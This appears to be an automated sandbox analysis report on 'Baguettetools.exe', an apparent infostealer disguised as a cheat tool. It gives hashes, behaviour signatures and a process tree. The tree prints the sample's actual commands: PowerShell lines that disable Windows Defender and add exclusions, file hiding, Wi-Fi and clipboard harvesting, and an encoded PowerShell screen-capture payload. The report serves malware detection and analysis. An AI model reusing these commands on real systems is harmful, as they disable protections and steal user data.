Analysis

  • max time kernel
    147s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-12-2024 04:20

General

  • Target

    Baguettetools.exe

  • Size

    83.9MB

  • MD5

    97b5214b858cc3ae3e65c0142f8b4cf8

  • SHA1

    8d87e3804fd95c370b663afc5bf3e1fad8c48bd3

  • SHA256

    77aeb68357c25d368dde1bbd7b17fae099c6a44bce15b7010de3e98f0dcb813b

  • SHA512

    3bb36cf8115cabb9bb5f2898425f852e56d9f7a563a835ef60bff45176d0ab3a9092f50b689124248d4ac464da0c31049e09a3e465079a4b9c194a767b781467

  • SSDEEP

    1572864:mvhlTybmP71O4zTLQBNkKTPa4z0Z7TUjsh5BAcLs3Vwpgx5+P7fEbIn:mZlTybhq0TkKTbzafJW3VwpU+IbI

Malware Config

Signatures

  • Enumerates VirtualBox DLL files 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 17 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe
    "C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:212
    • C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe
      "C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4028
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1852
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4744
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4108
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          PID:1904
          • C:\Users\Admin\AppData\Local\Temp\bound.exe
            bound.exe
            5⤵
            • Enumerates VirtualBox DLL files
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5852
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\wedontcare\""
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:5048
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Admin\wedontcare\activate.bat
              6⤵
                PID:5668
                • C:\Windows\system32\attrib.exe
                  attrib +s +h .
                  7⤵
                  • Sets file to hidden
                  • Views/modifies file attributes
                  PID:1688
                • C:\Users\Admin\wedontcare\TheBaguettecheats,exe.exe
                  "TheBaguettecheats,exe.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:5216
                  • C:\Users\Admin\wedontcare\TheBaguettecheats,exe.exe
                    "TheBaguettecheats,exe.exe"
                    8⤵
                    • Enumerates VirtualBox DLL files
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of SetWindowsHookEx
                    PID:5424
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\wedontcare\""
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      PID:772
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell (Get-CimInstance Win32_ComputerSystemProduct).UUID
                      9⤵
                        PID:2688
                  • C:\Windows\system32\taskkill.exe
                    taskkill /f /im "bound.exe"
                    7⤵
                    • Kills process with taskkill
                    PID:4392
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:908
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Baguettetools.exe"
              4⤵
              • Views/modifies file attributes
              PID:64
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‌ .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3208
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‌ .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3060
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4160
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:912
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3176
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1044
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:3108
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4352
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:4768
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5616
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
                PID:4728
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5776
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:1200
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:5572
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                    3⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:4276
                    • C:\Windows\system32\netsh.exe
                      netsh wlan show profile
                      4⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:5564
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "systeminfo"
                    3⤵
                      PID:4252
                      • C:\Windows\system32\systeminfo.exe
                        systeminfo
                        4⤵
                        • Gathers system information
                        PID:5244
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                      3⤵
                        PID:2700
                        • C:\Windows\system32\reg.exe
                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                          4⤵
                            PID:5760
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                          3⤵
                            PID:440
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5188
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kb4rtlhv\kb4rtlhv.cmdline"
                                5⤵
                                  PID:808
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC32.tmp" "c:\Users\Admin\AppData\Local\Temp\kb4rtlhv\CSC611473CF8C1E42BEAD19A334175841B.TMP"
                                    6⤵
                                      PID:5504
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:5924
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:5964
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:5412
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:5572
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:5872
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:5716
                                            • C:\Windows\system32\attrib.exe
                                              attrib -r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:2484
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:5168
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:5156
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                3⤵
                                                  PID:5248
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +r C:\Windows\System32\drivers\etc\hosts
                                                    4⤵
                                                    • Drops file in Drivers directory
                                                    • Views/modifies file attributes
                                                    PID:5132
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:5832
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:1780
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      3⤵
                                                        PID:5448
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          4⤵
                                                          • Enumerates processes with tasklist
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2236
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:5972
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:396
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3808"
                                                            3⤵
                                                              PID:6140
                                                              • C:\Windows\system32\taskkill.exe
                                                                taskkill /F /PID 3808
                                                                4⤵
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1092
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:5876
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
